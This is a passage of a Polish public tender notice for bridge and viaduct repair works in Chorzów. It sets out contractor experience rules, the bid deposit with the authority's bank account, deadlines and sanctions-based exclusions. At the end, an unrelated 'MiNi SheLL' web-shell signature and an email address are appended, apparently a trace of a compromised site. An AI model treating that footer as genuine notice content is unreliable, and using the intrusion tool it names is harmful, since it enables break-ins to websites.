UE.<br/>b) Doświadczenie Wykonawcy<br/>Wykonawca winien posiadać doświadczenie w wykonywaniu robót budowlanych, w szczególności w okresie ostatnich 5 lat<br/>przed dniem wszczęcia postępowania, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, Wykonawca<br/>wykonał należycie co najmniej dwie roboty budowlane z których każda polegała na przebudowie i/lub remoncie obiektu<br/>inżynierskiego - most, wiadukt, estakada, kładka.<br/>Uwagi:<br/>- Jeżeli Wykonawca posiada doświadczenie w realizacji robót budowlanych wykonanych wspólnie z innymi wykonawcami,<br/>może powoływać się wyłącznie na zakres faktycznie wykonany przez Wykonawcę.<br/>W przypadku Wykonawców wspólnie ubiegających się o zamówienie warunek zdolności technicznej lub zawodowej<br/>oceniany będzie łącznie, przy czym w przypadku doświadczenia Wykonawcy, w zw. z art. 117 ust. 3 i 4 ustawy PZP, -<br/>Wykonawcy wspólnie ubiegający się o zamówienie mogą polegać na zdolnościach tych z wykonawców, którzy wykonają<br/>roboty budowlane do realizacji których te zdolności są wymagane, co oznacza, że treść oświadczenia, o którym mowa w art.<br/>117 ust. 4 ustawy PZP, winna odzwierciedlać sposób w jaki konsorcjum wykazuje spełnienie warunku udziału w<br/>postępowaniu w zakresie doświadczenia. W sytuacji, gdy tylko jeden z członków konsorcjum wykazuje się wymaganymi do<br/>realizacji zamówienia zdolnościami (doświadczeniem), to żeby doszło do faktycznego wykorzystania tych zdolności, zgodnie<br/>z normą wynikającą z art. 117 ust. 3 ustawy PZP – powinien on uczestniczyć w każdej z czynności składających się na<br/>wykonywanie zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1) W celu potwierdzenia<br/>braku podstaw do wykluczenia Wykonawcy z udziału w postępowaniu określonych w pkt XV. 1 SWZ – oświadczenie Wykonawcy o<br/>aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy PZP w zakresie podstaw do wykluczenia z<br/>postępowania wskazanych przez Zamawiającego (Załącznik nr 6 do SWZ).<br/>2) W przypadku Wykonawców wspólnie ubiegających się o zamówienie:<br/>a) Oświadczenie, o którym mowa w pkt XXI.2. 1) składa każdy z Wykonawców.<br/>3) W przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby:<br/>a) W celu wykazania, że wobec tych podmiotów nie zachodzą przesłanki wykluczenia Wykonawca składa także oświadczenie o<br/>którym mowa w pkt XXI.2. 1) podmiotu udostępniającego zasoby.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Warunkiem uczestnictwa w przetargu jest wniesienie wadium w wysokości:<br/>6 000,- zł (słownie: sześć tysięcy złotych 00/100).<br/>2. Wadium należy wnieść przed upływem terminu składania ofert i utrzymać nieprzerwanie do dnia upływu terminu<br/>związania ofertą, z wyjątkiem przypadków o których mowa w art.98 ust.1 pkt 2 i 3 oraz ust. 2 ustawy PZP.<br/>3. Wadium może być wniesione według wyboru Wykonawcy w jednej lub kilku następujących formach:<br/>1) w pieniądzu - przelewem na rachunek bankowy Zamawiającego:<br/>Miejski Zarząd Ulic i Mostów w Chorzowie, ul. Bałtycka 8A Nr rachunku:<br/>ING Bank Śląski S.A. o/Chorzów Nr 72 1050 1243 1000 0010 0000 3770<br/>Uwaga: za datę wniesienia wadium w tej formie uważa się datę wpływu środków pieniężnych na konto Zamawiającego.<br/>Do oferty należy dołączyć kopię polecenia przelewu.<br/>2) w gwarancjach bankowych.<br/>3) w gwarancjach ubezpieczeniowych.<br/>4) w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o<br/>utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.<br/>4. W przypadku składania przez Wykonawcę wadium w formie gwarancji lub poręczenia Wykonawca przekazuje<br/>Zamawiającemu oryginał gwarancji lub poręczenia w postaci elektronicznej.<br/>5. W przypadku składania przez Wykonawcę wadium w formie gwarancji lub poręczenia gwarancja powinna być<br/>sporządzona zgodnie z obowiązującym prawem i winna zawierać następujące elementy:<br/>1) nazwę dającego zlecenie (Wykonawcy), nazwę beneficjenta gwarancji (Zamawiającego), nazwę gwaranta (banku lub<br/>instytucji ubezpieczeniowej udzielającej gwarancji) oraz wskazanie ich siedzib,<br/>2) określenie wierzytelności, która ma być zabezpieczona gwarancją,<br/>3) kwotę gwarancji,<br/>4) termin ważności gwarancji,<br/>5) nieodwołalne i bezwarunkowo zobowiązanie gwaranta do: „zapłacenia kwoty gwarancji na pierwsze pisemne żądanie<br/>Zamawiającego zawierające oświadczenie, że zachodzi przewidziana przepisami prawa zamówień publicznych podstawa<br/>do zatrzymania wadium przez Zamawiającego.<br/>6. Gwarancja (poręczenie) nie może przewidywać żadnych dodatkowych warunków formalnych, od których uzależniona<br/>byłaby wypłata sumy gwarancyjnej (poręczonej),<br/>a w szczególności nie może zawierać postanowień przewidujących obowiązki Zamawiającego do: <br/>1) przedstawienia bankowego potwierdzenia podpisu lub wzoru podpisu osoby podpisującej wezwanie do wypłaty sumy<br/>gwarancyjnej (poręczonej);<br/>2) złożenia wezwania do wypłaty sumy gwarancyjnej (poręczonej) za pośrednictwem banku lub innego podmiotu;<br/>3) przedstawienia jakichkolwiek innych dokumentów, w tym w szczególności korespondencji z Wykonawcą lub dokumentów<br/>potwierdzających niewywiązanie się z obowiązków przez Wykonawcę. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy wspólnie ubiegający się o zamówienie:<br/>1) Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają<br/>pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania ich w<br/>postępowaniu o udzielenie zamówienia i zawarcia umowy w sprawie zamówienia publicznego.<br/>2) Wykonawcy wspólnie ubiegający się o zamówienia dołączą do oferty oświadczenie, z którego będzie wynikać, które<br/>roboty budowlane wykonają poszczególni Wykonawcy (Załącznik nr 7 do SWZ), przy czym treść oświadczenia winna<br/>odzwierciedlać sposób w jaki Konsorcjum wykazuje spełnienie warunku udziału w postępowaniu w zakresie zdolności<br/>technicznej lub zawodowej. W sytuacji, gdy tylko jeden z członków konsorcjum wykazuje się wymaganymi do realizacji<br/>zamówienia zdolnościami (doświadczeniem), to żeby doszło do faktycznego wykorzystania tych zdolności, zgodnie z normą<br/>wynikającą z art. 117 ust. 3 PZP – powinien on uczestniczyć w każdej z czynności składających się na wykonywanie<br/>zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 3. Zamawiający, zgodnie z art. 455 ust. 1 ustawy PZP, przewiduje możliwość dokonania zmian postanowień zawartej umowy<br/>w sprawie zamówienia publicznego, w sposób i na warunkach określonych w projekcie umowy stanowiącym załącznik nr 3<br/>do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-07-14 07:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć za pośrednictwem Platformy przetargowej https://mzuim.logintrade.net/rejestracja/ustawowe.html</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-07-14 08:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-08-12</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Zgodnie z art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach<br/>w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego ( DZ. U. z<br/>2022 r., poz. 835) (dalej ustawa z dnia<br/>13 kwietnia 2022 r.) z postępowania o udzielenie zamówienia publicznego prowadzonego na podstawie ustawy z dnia 11<br/>września 2019 r. – Prawo zamówień publicznych wyklucza się:<br/>1) Wykonawcę wymienionego w wykazach określonych w rozporządzeniu Rady (WE)<br/>nr 765/2006 z dnia 18.05.2006 r. i rozporządzeniu Rady (UE) nr 269/2014 z dnia 17.03.2014 r. albo wpisanego na listę na<br/>podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy<br/>z dnia 13 kwietnia 2022 r. ;<br/>2) Wykonawcę, którego beneficjentem rzeczywistym w rozumieniu ustawy z dnia<br/>1 marca 2018 r. o przeciwdziałaniu praniu pieniędzy oraz finansowaniu terroryzmu (Dz. U. z 2022 r. poz. 593 i 655) jest<br/>osoba wymieniona w wykazach określonych<br/>w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisana na listę lub będąca takim beneficjentem rzeczywistym<br/>od dnia 24 lutego 2022 r., o ile została wpisana na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej<br/>o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy z dnia 13 kwietnia 2022 r.;<br/>3) Wykonawcę, którego jednostką dominującą w rozumieniu art. 3 ust. 1 pkt 37 ustawy<br/>z dnia 29 września 1994 r. o rachunkowości (Dz. U. z 2021 r. poz. 217, 2105 i 2106) jest podmiot wymieniony w wykazach<br/>określonych w rozporządzeniu 765/2006<br/>i rozporządzeniu 269/2014 albo wpisany na listę lub będący taką jednostką dominującą od dnia 24 lutego 2022 r., o ile został wpisany na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa<br/>w art. 1 pkt 3 ustawy z dnia 13 kwietnia 2022 r.<br/>Wykluczenie następuje na okres trwania okoliczności określonych w art. 7 ust. 1 ustawy<br/>z dnia 13 kwietnia 2022 r.<br/>W przypadku Wykonawcy wykluczonego na podstawie art. 7 ust. 1 ustawy z dnia<br/>13 kwietnia 2022 r., Zamawiający odrzuca ofertę takiego Wykonawcy.<br/>Przez ubieganie się o udzielenie zamówienia publicznego rozumie się złożenie oferty.<br/>Osoba lub podmiot podlegające wykluczeniu na podstawie art. 7 ust. 1 ustawy z dnia<br/>13 kwietnia 2022 r., które w okresie tego wykluczenia ubiegają się o udzielenie zamówienia publicznego lub biorą udział w<br/>postępowaniu o udzielenie zamówienia publicznego, podlegają karze pieniężnej. Karę pieniężną nakłada Prezes Urzędu<br/>Zamówień Publicznych, w drodze decyzji, w wysokości do 20 000 000 zł. Wpływy z kar pieniężnych stanowią dochód<br/>budżetu państwa.<br/>W przypadku Wykonawców wspólnie ubiegających się o zamówienie żaden z nich nie może podlegać wykluczeniu z<br/>postępowania na podstawie ww. przesłanek.<br/>W przypadku powoływania się na zasoby podmiotów trzecich Zamawiający bada, czy nie zachodzą wobec tego podmiotu<br/>podstawy wykluczenia, które zostały przewidziane względem Wykonawcy.

Creat By MiNi SheLL
Email: jattceo@gmail.com